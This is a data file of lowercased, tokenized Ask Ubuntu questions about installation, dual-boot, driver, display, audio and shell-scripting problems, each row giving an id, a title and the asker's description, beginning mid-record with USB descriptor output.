descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 6 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x04 ep 4 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0000 1x 0 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x85 ep 5 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 6 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 6 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 1 bnumendpoints 6 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x04 ep 4 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0020 1x 32 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x85 ep 5 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 6 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 6 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 255 vendor specific subclass bdeviceprotocol 255 vendor specific protocol bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) this is iwconfig : eth0 no wireless extensions . lo no wireless extensions .
354904	ubuntu : ca n't install sdl1.2-dev due to broken packages	i tried to install libsd1.2-dev , but got an error due to some dependencies that i do not know how to solve . sudo apt-get -f install libsdl1.2-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libsdl1.2-dev : depends : libglu1-mesa-dev but it is not going to be installed or libglu-dev e : unable to correct problems , you have held broken packages . my uname -a is : linux moon 3.8.0-31-generic # 46-ubuntu smp tue sep 10 19:56:49 utc 2013 i686 i686 i686 gnu/linux running lubuntu-desktop . installed is libsdl1.2-debian ( version 1.2.15-5ubuntu1 ) any help would be very much appreciated .
354909	assigning file extensions to a program	i recently installed the latest version of maple ( math software ) and it works just fine but thereâs a small issue of ubuntu not recognizing the extensions ( .mw , .mws ) properly . i can load maple and then open such files , but if i double click a file i have to select an application , and maple isnt even one of the applications in the list . is there some way to assign file extensions to a program ? thanks !
354912	how to terminate application called from bash script ?	i want to call some application from script . i use an application which does n't allow any parameters in cli but i need to test it in two different monitors and screen resolutions so i have two different configuration files . to call needed version i use simple script ( name it notebook.sh ) : # ! /bin/sh rm /home/user/.app/config.ini cp /home/user/.app/config.ini.1366x768 /home/user/.app/config.ini sleep 1 /usr/local/bin/app & or second version with cp line changed . ok , it 's simple . but when i quit this app ( ctrl+q built-in function ) it still runs . calling ps command i see app and notebook.sh in processes list . my question is : how should notebook.sh script be written to terminate/kill app and script totally ? something like this piece of code : if [ `` $ 1 '' = `` start '' ] ; then /usr/bin/mplayer -fs -osdlevel 0 $ 2 ; fi if [ `` $ 1 '' = `` stop '' ] ; then killall mplayer ; fi
354915	`` quote '' command in the shell	what is the usage of the command quote ? i have n't found any info about it , it is n't among the executable files in /bin folders , and it can not be found among bash built-ins . it seems that it only prints its first parameter , like an echo command and nothing more .
354916	keyboard shortcut script not working	i finally gave up on getting my fn+up and fn+down keys to change my screen brightness on my laptop . i took a brightnessup.sh and brightnessdown.sh script and put them in /etc/acpi and then went to keyboard shortcuts to and assigned the scripts to ctrl+up and ctrl+down and finally after months was able to change my brightness with my keyboard . but no sooner did i get it working , i restarted my computer and it no longer works . can anybody tell me how to get this working again ? in terminal sudo /etc/acpi/brightnessup.sh and sudo /etc/acpi/brightnessdown.sh changes the brightness so i know the script works but it is not running with the assigned keys .
354922	when i boot i do not get the option to boot to windows	i did my first install of ubuntu last night . i am totally new to the whole linux thing , and i am having a problem when i boot . when i boot the computer i get the option to boot to linux , and i also get the option to boot to about 4 other things . my problem is that none of these things are windows . i can boot into windows change pc settings . this works , but is a pain in the ass considering i have to go through like 4 steps to get windows to boot . can anyone tell me what i am doing wrong and let me know what i need to submit to solve this problem ? below is a shot from my cell phone of what i see at the boot screen . i also ran boot repair . my paste was this .
354928	ussd requests via mobile broadband	basically what i want to do is to check my balance of my prepaid sim-card , which is located in a 3g-modem ( usb ) . some background information : the provider of my 3g-internet ( called beeline ) is also offering cell phone services . to check the balance on any sim-card i can just type *102 # on any mobile phone and will receive back a notice of my balance . so what always works is to take out the sim-card out of the modem into a cell-phone and check the balance by `` calling '' *102 # the modem came with a windows-program which has a button `` check balance '' . i do n't want to try to emulate this program with wine for various reasons . and i do n't have to because -- thank ubuntu -- the modem is running without any problems out of the box . my thought would be : is there a possibility of doing these ussd-requests ( which do n't seem to be a problem with any random phone ) via the 3g-modem through ubuntu ?
354930	shutdown command no longer works	i am running ubuntu 12.04 which was working fine . i decided to try wine to install some all windows software and messed around a bit - some worked some didnâ´t . anyway , since my wine adventures yesterday , ubuntu will not shut down . if i choose shutdown the screen goes blank and then returns to the ubuntu logon screen . what is blocking shutdown ? thanks
354932	screen resolution stuck at 640*480	so i installed 12.10 and i am stuck in 640x480 resolution . i cant resize the resolution since the screen wont let me scroll down to see all the settings for screen resolution . can anyone help me out also a little new to linux
354934	use grabc in python script	i want to work with the return value of grabc . if it returns # 000000 then i want to take it to a= # 000000 . but this outputs the value in terminal . so how can i do this ? [ n.b : grabc is a tool for finding out the rgb value at mouse click . use sudo apt-get install grabc ]
354936	will i loose my data stored in a different partition to the one that i will install ubuntu 12.04 ?	i want to install ubuntu 12.04 in my laptop replacing my existing windows 8 pro ( am not affected by the uefi since my laptop was a windows 7 intial laptop ) . however i have several partitions in my hard disk as shown in the link below where c : is where my windows 8 is installed and d : is where my backup is , there is also a system reserve partition . i do not want to loose any of my backup data in d : how can i install ubuntu without loosing this data ? and once i install ubuntu will i be able to access the partition d : ? hard disk partitions photo
354948	unable to boot into ubuntu 12.10 installed outside windows 8	i am using sony vaio e series . i installed ubuntu in one drive . but when i restarted the system it directly goes into windows without showing any options for ubuntu 12.10.i am new to ubuntu . please help me . thanks
354956	questions about xournal	when open a pdf file in xournal , how can i select original text show the bookmarks ( i.e.outlines ) on a separate panel ? search in the original text and the added annotated text ? thanks !
354959	where are the isos for disk encryption version of ubuntu 13.04	i would like to do a bootable usb key and encrypt the system . this was done before with alternate cds but it seems that it does not exist anymore . where are the isos that replace the alternate cds ? thanks
354960	does ubuntu install alongside windows 7 ?	does ubuntu run alongside windows 7 ? how much space does it need ? using windows installer lts .
354962	create glfw projects in codeblocks on ubuntu 13.04	since a couple of days i am trying to install or add the glfw library to codeblocks but without success . has anyone tried this before or knows how to do it ? any help would be greatly appreciated .
354963	add shut-down/logout indicator to panel	i tried to remove the weather icon from the panel . i found an instruction on ask ubuntu ( ca n't find it now ) that i followed . the problem is that it also removed the `` shut down '' -icon , the power-indicator , the mail-indicator as well as the date-indicator . how do i get these back ?
354964	minidlna gives error `` sudo : unable to resolve host < local server > ''	i got a problem with the minidlna server . when i try to start the server minidlna give the following error . sudo : unable to resolve host ... ... ... ... .. ( the local server ) i ca n't find what the problem is . i 'm using ubuntu 12.04
354965	dell xps 18 : touchscreen works on opensuse ! how to do it in ubuntu ?	on my dell xps 18 tablet-pc , the touchscreen is known not to work in ubuntu . i just tried the opensuse factory kde live cd . after installing a few extra packages - see http : //doc.opensuse.org/documentation/html/opensuse/opensuse-reference/cha.tablet.html # sec.tablet.install touching the screen worked like a charm without rebooting or relogging . i tried to install the same ( or similarly ) named packages in an ubuntu 13.04 live system - does n't work . does anyone know how to transfer it to ubuntu ? i really do n't wan na use suse .
354966	does ubuntu update the official download version to reflect changes	does ubuntu update the official download page to reflect changes since a version was released ? i already have a copy of 13.04 , as released in april 2013 , on a dvd . i am contemplating installing 13.04 on another computer . if ubuntu does update the copy available for download , i will undertake a new download . otherwise , i will install the april 2013 version and then run the update program .
354967	glib.gerror : no d-bus daemon running	when trying to run meld on ubuntu desktop 13.04 , i get the following error : $ meld ( meld:1509 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-eqehnpp7h5 : connection refused traceback ( most recent call last ) : ... glib.gerror : no d-bus daemon running i am running as a non-root user , with a x11 forwarding through putty/ssh to xming .
354969	unable upgrade 11.10	several attempts to upgrade went nowhere update manager displays that system is up-to-date and launches a new active window stating : '' your ubuntu release is not supported anymore . '' `` you will not get any further security fixes or critical updates . please upgrade to a later version of ubuntu linux . '' but after that it displays a new window `` new ubuntu release '12.04.03 lts ' is available '' with an `` upgrade '' button that can activate the process , but the process halts with the message : '' authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server '' i tried to attach screenshot , but as i am new , the rules do not allow me to do it is there any way to resolve this or should install after formatting existent installed version ?
354973	how to disable unity-panel-service ( top indicators panel ) auto-hide option ?	i alt+super+rightclick on the top indicators panel , and tested the auto-hide option . now it wont un-hide anymore ! ! there is not option in dconf-editor for it ; there is only option to disable auto-hide to the laucher ( on the left edge ) . any idea where that config is stored ?
354974	dual screen maximize issue on left screen after installation / removal of nvidia drivers	i 've recently installed a fresh 13.04 ubuntu 64-bits version on my dell latitude laptop and the os built-in display manager was handling fine the dual monitor mode . as i wished to have nvidia driver to have a better experience i followed these steps to get it : http : //www.dedoimedo.com/computers/ubuntu-ringtail-nvidia.html however , after installing nvidia proprietary drivers , my ubuntu was failing to start properly , and after system start-up , only the desktop was appearing , with no unity , nor launcher nor dash appearing . then i could succesfully remove nvidia drivers by doing the following steps : switch to console mode : alt+ctrl+f1 sudo service lightdm stop sudo apt-get remove -- purge sudo x -configure sudo mv xorg.conf.new /etc/x11/xorg.conf sudo start lightdm after all this , system was working again , but with this annoying issue : when i try to maximize any window , it always goes maximized to the display on the right . also the mouse cursor vanishes on the screen if i drag it to the right edge of the right monitor , and reappears only when i move the cursor back to the left screen . i have already extensively googled for similar issues reported by other users , and tried some solutions , but the issue still happens for me . did n't work for me : using launchpad with ctrl + super + arrow keys installing compiz config settings manager setting external monitor as primary instead of secondary '' dconf reset -f /org/compiz/ '' followed by `` unity -- reset-icons & disown '' any help would be much appreciated , as for now the only solution for this would be reinstalling the whole os : ' ( > additional info : this is the following info about my video card : ~ $ : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119m [ nvs 4200m ] ( rev a1 ) regards , alysson
354975	xubuntu monitor laptop	i 'm new on linux , i just installed xubuntu 13.04 on my old laptop hp pavillon zv5000 . but only the external monitor is working . the laptop 's monitor doese n't work . only shows black and gray squares . can anyone help me ?
354983	can i remove file-roller without removing ubuntu-desktop ?	i am running ubuntu 12.04 . when i try to remove file-roller ( the built-in `` archive manager '' app ) from my system as i now use ark ( using synaptic package manager ) , it asks me to also remove ubuntu-desktop ( which i assume is the unity de ) . i do n't want to uninstall unity from my system , so how do i go about removing this , whilst keeping unity installed ?
354990	fixed black screen after update and restart , do i need to do this now : ... ?	fixed black screen after update and restart by shutting down the pc with the power button..nothing else , but i saw some dude posted this in order to fix this issue , so i 'm asking now - do i need to do these steps now , since i do n't get the black screen again anymore ? update to kernel 3.9.3 ; http : //www.ubuntukiller.com/2013/05/how-to-updateupgradeinstall-linux.html # .uaaiiocw0jn patch the bcm4312 drivers afterwards ( be sure to download the file before the kernel upgrade as your internet is gone after the upgrade ) ; http : //www.mindwerks.net/2012
354991	how to prevent etckeeper from saving cups/subscriptions.conf.0	anacron sends me this message daily : /etc/cron.daily/etckeeper : committing to : /etc/ modified cups/subscriptions.conf.o committed revision 384 . i have added this file to /etc/.bzrignore : ... # end section managed by etckeeper subscriptions.conf subscriptions.conf.o cups/subscriptions.conf cups/subscriptions.conf.o but etckeeper still keeps saving it . how do i prevent this ? ubuntu 10.04.4 , up to date .
354993	how to remove lines from the text file containing specific words through terminal ?	how to remove all the lines from the text file containing the words `` cat '' and `` rat '' ?
354996	can maas install non-ubuntu operating system	can i use maas to install a heterogeneous cluster , where some nodes run ubuntu and others run other operating systems ? if so , is there a list of supporting operating systems or a guide on how to prepare an image for another os ?
354998	how do i download and install wireless drivers with no internet ?	i installed ubuntu 12.04 alongside windows 7 on a hp dv6700 laptop . i can access wireless internet from my windows side , but not on ubuntu . i have no wired connection available to me to use . i believe the wireless does not work on ubuntu because i need the appropriate drivers . however , i ca n't download them while in ubuntu because of the lack of any internet connection . my questions , then , are i ) how do i download the driver to a flash drive ( and where do i get the appropriate one ) using the windows side , and ii ) how to i then install it on my ubuntu side ?
355000	how do i set up a blackberry as a modem without desktop software ?	i 'm a bit of a noob on ubuntu but i love it ! our pc at work was pure garbage and so i decided to update to ubuntu to salvage the old hog ! the only problem i have is that there is no internet connection at all ( i agree , ridiculous ! ) . is there any way that i can use my blackberry as a modem without having to download any additional software ( as that would be impossible without internet connection ) ? the one thing i thought i could possibly try is to download linberry or berry4all on my home system , transfer to a usb stick and install at work off of there , but i 'm not sure if that 's possible . if so , can someone give me instructions on how to do the said task ? any input is greatly appreciated ! !
355001	wacom cth-460 pen up not always detected	how do i to fix wacom bamboo cth-460 fails to always detect pen up in 64bit ubuntu 13.04 and 13.10 beta . wacom volito ctf-420 works fine .
355003	acronis copied kubuntu	when i restore an acronis true image 10 copy of a running kubuntu system and try to boot it it stops at a initramfs prompt and says it ca n't find the root directory . what commands do i type to re-activate the grub loader ?
355008	why do my windows shade ( roll up ) on scroll when my cursor is at the right edge of a maixmized window ?	i 'm using ubuntu 13.04 and whenever i have a window maximized and use the scroll wheel while the cursor is on the right edge , the window rolls up . this is annoying since the scroll bar is on the right edge and i 'm trying to scroll up the page but my cursor moves to the very edge and the whole window rolls up . is this a new behaviour that can be disabled ? or is this a bug that should be reported elsewhere ?
355011	can not boot windows 8 after formatting ubuntu drive	i 'm unable to boot windows 8 . my windows 8 is located on a ssd # 1 . ubuntu 12.04 was located on ssd # 2 . i did a dumb thing and i have formatted ssd # 2 via windows ( because i do not really want to play with linux anymore ) now the problem is that i 'm unable to boot windows 8 . after rebooting , in dos there is an error : loading operating system ... error : no such device : 6360 ( ... ) grub rescue > what i 've tried was repairing the mbr via command line when using the windows 8 iso . http : //www.redmondpie.com/how-to-fix-windows-8-mbr-master-boot-record/ http : //www.sevenforums.com/tutorials/20864-mbr-restore-windows-7-master-boot-record.html neither of those things worked . how do i fix it ? please help : (
355012	file comparison on the command line	there are 2 files , that are almost similar . say , for example , only 2 lines in one file do not match the contants of another file . is there a way to make a comparison between these 2 files , and write the difference to the another file ?
355019	ubuntu dual boot windows 8	i installed ubuntu 13.xxxx the latest version for desktop . i did so as a dual boot with uefi and secureboot enabled . now i can boot into ubuntu just fine . however , i ca n't boot to windows 8 . i have been told boot-repair is the answer to this . that 's great . however , i ca n't boot to disc or usb at the moment . i ca n't turn secure boot off from the bios . so how would i go about running boot repair like this ?
355022	ufw before.rules file blank , does this impact setting up vpn server ?	hi all please assit i am trying to setup open-vpn following this link and currently having some issues . easiest way to setup ubuntu as a vpn server step 10 were i have to edit the ufw 10 : this step assumes you have ufw . `` edit /etc/ufw/before.rules , and add the following either at the beginning of /etc/ufw/before.rules or just before the *filter rules ( recommended ) . when the nano editor opened the page was blank i was suprised to see blank screen i still proceeded to enter the details . not sure if i am in the right track here ? .
355030	brightness settings lenovo y500	having trouble changing the brightness settings for the backlight on my lenovo y500 with a gt650m gpu . so i followed this guide here , http : //ubuntuforums.org/showthread.php ? t=2095063 & page=3 & p=12434372 # post12434372 i followed the instructions to the t. i can only change my brightness to a medium level and then it locks there . i 'm totally new to ubuntu . i have tried all the fixes i 've found on google to avail . please somebody help me . i was happy to at least get it down from an eye blinding level but i still want more control . thanks for the input .
355032	formated xfs partition to ext4 by mistake , can it be recovered ?	i formatted a xfs partition by mistake to ext4 . can this be undone and the data recovered ? actually , i did not chose to have the partition reformatted during installation , i just kept the default partition type ext4 , when i should have selected xfs , so i do not know if the installer reformatted it or just changed the partition type . i 'll give a try to testdisk since i now have cloned the drive with dd .
355034	ubuntu 12.04.3 lts installation failed . says : `` grub installation failed ''	the error maessage read as- '' the grub-efi-amd64-signed package failed to install into /target/ . without the grub bootloader the system will not load '' i 'm trying to install it on hp pavilion g6-2303 tx using usb . how do i fix this problem ?
355037	error in installing bad piggies game through wine	i am trying to install bad piggies game using wine but the following is appearing in the terminal : vmlinux @ ubuntu : ~ $ wine uninstaller fixme : storage : create_storagefile storage share mode not implemented . err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : richedit : readstylesheet skipping optional destination err : msi : action_installfiles failed to copy l '' c : \\users\\vmlinux\\application data\\rovio entertainment ltd\\bad piggies 1.3.0.0\\install\\9d1a059\\updater.exe '' to l '' c : \\program files ( x86 ) \\rovio entertainment ltd.\\bad piggies\\updater.exe '' ( 2 ) err : msi : iterate_actions execution halted , action l '' installfiles '' returned 1603 err : msi : iterate_actions execution halted , action l '' executeaction '' returned 1603 the installation failed . what may the problem be ? ( i have ubuntu 13.04 ) .thank you .
355038	additional toolbar - one click short cuts	is there is any way to create a `` toolbar '' of folder containing short cuts ? by short cuts i mean - web , catalogues , radio , programs , docs in that folder at win xp i could create on each screen edge a toolbar by simply puling a folder to it . now i am at ubuntu/unity and , well ... its like a big step back for me . `` system is only background for programs '' sorry for my pov but easy way to run pc is when you have everything under one click .
355039	saving data into bootable pendrive	i 've created a bootable usb stick for ubuntu 13.04 , and my windows and linux machines still recognize it as a normal fat32 flash drive with data in it . would it still work the linux boot if i saved more data in it as long as i do n't delete anything that the usb boot installer put there ?
355040	12.04 boot goes straight to grub then hangs on black screen , what do i do ?	i have ubuntu 12.04 installed on a toshiba satellite c655 . no windows and no windows disk . ubuntu worked great for about a month . about a week ago after updating it started freezing , and on boot i would get an error of `` /tmp not ready or not present '' . two days ago update manager listed 19 new updates , i let it install and now it will not boot . when i press the power button it goes straight to grub . in grub `` ubuntu , with linux 3.8.0-31-generic '' is highlighted , i press enter and i get `` target file system does n't have requested /sbin/init . no init found . try passing init= bootarg . '' i entered `` init= bootarg '' and i get , `` /bin/sh : bootarg : not found . now what do i do ?
355042	error : java_home is not defined correctly - after maven installation	i installed java jdk on ubuntu 12.04 and added java home to my path at ~/.bashrc : export path=/opt/jdk1.7.0_40/jdk1.7.0_40/bin : $ path this looks a little bit strange but it 's really my path . after this i installed maven through : sudo apt-get install maven it installed all the needed libraries and now when i run mvn -version , i see : error : java_home is not defined correctly . we can not execute /opt/jdk1.7.0_40/bin/java what is wrong with it ? how to solve this trouble ?
355044	can i access c : drive from xrdp ?	i am currently using win 7 pro and using rdp to connect to an amazon ec2 instance of ubuntu . is there any way i can access local drives on my pc from the ubuntu desktop ?
355045	what can a user do without sudo ?	i 'm setting up a server and want a user to only have access to his own files . i do a regular adduser command : sudo adduser username and give the user a password . then i log in to it via ssh and see that i can cd to / and to other users home folders . i do n't seem to have write access to much outside of ~/ , but i was just thinking exactly what damage can a new user do without having been added to the sudo group ? should i be taking more precautions and locking down the user further ?
355047	add image to 3gp file and convert it to mp4 using avconv por ffmpeg	i have a .3gp file , i want tp add an image tp 3gp file , then , convert this file to mp4 , 'avi ' or even webm . that it means : the audio is from 3gp , the image from another file ; merge the two to have mp4 file how can i do it using : i try to convert 3gp file to mp3 file because i know how to merge mp3 file & image to get video file mencoder mf : //myimage.png -o out.avi -ovc lavc -lavcopts vcodec=mjpeg -audiofile myfile.mp3 -oac copy -fps 1/187 -ofps 30 however this conversion does not work avconv -i myfile.3gp myfile.mp3
355052	problem with ubuntu server 12.04 screen flashing ( blink ) and full of text ( console )	after i installed ubuntu server 12.04 about one hour ago , i have a problem with the screen flashing ( blinking ) and being full of text that i do n't know what it is . byt when i boot up in recovery mode it works how do i make it by default to boot up like a normal one ? please help me fix it it 's blinking as you can see
355055	super slow or even no internet connection	i 'm new to this so pleas excuse if i ask a very naive question , and thanks in advance for the help ! i am having troubles accessing the intnet via my wifi , even though it works perfectly on any other operating system ( tried on windows , mac and even my android phone ) my problem is the following : i installed ubuntu 12.04 two days ago an my pc . i tried to access the internet via wifi and i had the problem that every website was loading extremely slow or not at all . i googled and apparently others had similar problems . following some instructions i disabled ipv6 and apparently the problem was fixed . i could surf and download with the high speed i am used to . a day later the thing problem was there again . even worse the fix that worked the first time did n't work anymore . i have no clue what the problem is . if i try to ping google.com i get half of the time `` unknown host '' and half of the time it works ( with 75 % packacge loss ) any help would be much appreciated !
355056	network issue help me solve this	i am using ubuntu on vmware workstation my host os is windows 8 pro . i access network via proxy server and when i try to access network in ubuntu i can not access the net . help me out i am new to ubuntu . my host network config ip 10.0.0.6 subnet 255.0.0.0 my ubuntu guest os config inet addr:192.168.80.3 mask 255.0.0.0
355059	wake up , xserver screen . ca n't stand it	recently switched from windows xp to xubuntu . this is my second question and also the last one , i hope . well , i 'm talking about another useless/secondary graphical issue . when i manage to open the lid , waking up the laptop , xserver welcomes me with his not-that-cool screen . is there any way to get rid of it and rescue a clear xubuntu login screen instead ? i definitely ca n't stand xserver .
355062	connection issues with rtl8723ae wireless ( maybe bad driver ? )	it constantly disconnects and the signal strength goes up and down . the problem is worse when another person connects and download movies . that should be a problem with either my pc or my router because my download speed should keep up with that , but i certainly need help . thanks in advance . p.d . i am a noob in linux , beware . output of sudo lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter here is the error when `` make '' : make -c /lib/modules/3.8.0-31-generic/build m=/home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012 modules make [ 1 ] : entering directory /usr/src/linux-headers-3.8.0-31-generic' cc [ m ] /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.o /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.c : in function ‘rtl_action_proc’ : /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.c:872:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.c:872:25 : note : each undeclared identifier is reported only once for each function it appears in /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.c : in function ‘rtl_send_smps_action’ : /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.c:1434:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/alejandro/downloads/rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012 ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-31-generic' make : * [ all ] error 2
355064	error partitioning hard drive during installation of ubuntu12.04.3 lts	i 've recieved a couple of errors while trying to install 12.04.3 lts ( 64 bit ) on my lenovo thinkpad t510 i5 laptop . the first error was , `` error ! ! ! input/output error during write on /dev/sda '' i 've encountered this a few times so i 've tried both of either clicking `` ignore '' and clicking `` retry . '' if i click `` ignore '' then i eventually get to the second error described below . second error : `` the creation of swap space in partition # 5 of scsl1 ( 0,0,0 ) ( sda ) failed '' once this error is recieved i am recieve no further instructions from the installer , as if i never tried to instal to begin with . and then on future attempts to boot from usb thumbdrive i have to manually ( thinkpad button + f12 ) tell the machine to boot from usb or a blinking white line will just stare at from the corner until i forcibly power down . but back to the original issue ; it probably is important to note that i recently removed a toshiba hard disk from an imitation external hard drive and installed it in the thinkpad . the external hard drive was working fine before so i 'm inclined to think the hard drive in the lenovo should still be functioning . i tried to use the ubuntu supported smart technology but i 'm not sure if this toshiba hard disk supports it . if it 's important i can post the model # ; all i remember is that it operates at 5400 rpm and can hold around 320gb . i 'm thinking about using the thinkpad 's hard drive test utility but wanted to see if i could get any info from this ubuntu forum in parallel . this is my first attempt at using/installing ubuntu so please take that in consideration when responding with recommendations . i 'm a quick learner though so also do n't feel like you have to leave out in detail . thanks in advance to any insights anyone has to offer .
355065	after removed lubuntu-desktop , still got lubuntu lockscreen	i installed lubuntu-desktop , removed it , and now i still got the lubuntu lockscreen . since yesterday it is even worse , now when i unlock my session i have the unlock screen from lubuntu , then the one of ubuntu ! ( i installed lubuntu-desktop )
355070	is it possible to know from apt if the package was installed explicitly or as a dependency of another package ?	let 's say there are a , b and c package . a and c were installed manually with apt-get install , and b is a dependency of a and was installed by apt automatically . is it possible to know that with some apt-* or dpkg command ?
355071	install firefox , chrome or update ubuntu	all i want is to install either chrome or firefox on my machine . it is running ubuntu 9.04 i can not update ubuntu or firefox . help !
355073	installing ubuntu	i have an old computer and wanted to install ubuntu 12.04.3 . my problem is it wo n't even detect the hard drive to install the os after the screen displays the ubuntu install screen . i am new to linux and wish to learn more about it , but installing it just gives me a black screen , does n't show that it is installing , and stays on this black screen with letters from the hd sectors . please help .
355074	how to install ubuntu on old computer using a dvd ?	i 'm new to linux and am trying to put ubuntu on a presario 6000 . i burned ubuntu onto a dvd and put it in the optical drive , but it keeps saying : non-system disk or disk error , replace and strike any key when ready i 'm not sure what to do because still trying to learn more about computers and operating systems .
355076	big data case study	i 'm looking to port an existing bi ( business intelligence ) solution to open source . can anyone reference a similar project with solutions that run atop ubuntu server ? perhaps embedded ? thanks .
355080	i have major problem and need to save my laptop	my brightness was not working , i was trying to find a solution , well it was a bad call . the tutorial for brightness control was that i need to change xorg.conf , to add a line . i did n't find xorg.conf file in /etc/x11 and i created with line of code that `` helps '' . well when i restarted pc screen was black ( aprox . when login screen needs to show ) . i can not access to hdd . i tried to boot ubuntu live cd , but it does n't allow me to delete it i tried gksu , gksudo nautilus , etc ... here comes the tricky part i am not starter and i know something problem causing file is only show in regular nautilus ( not in gksu nautilus nor the terminal ! ) . can someone help me how to delete this noisy file ! ?
355082	pulseaudio loopback unload audio output devices	i need to know how to unload pulseaudio loopback outputs . i 'm using pulseaudio to create a loopback mix to capture my microphone and system audio for streaming . every time i launch my script which has this code : pactl load-module module-null-sink sink_name=mix pactl load-module module-loopback sink=mix pactl load-module module-loopback sink=mix avconv ... pactl unload-module module-loopback it leaves two output devices behind after it closes . the unload-module command gets rid of the recording one but i ca n't find a command for the outputs .
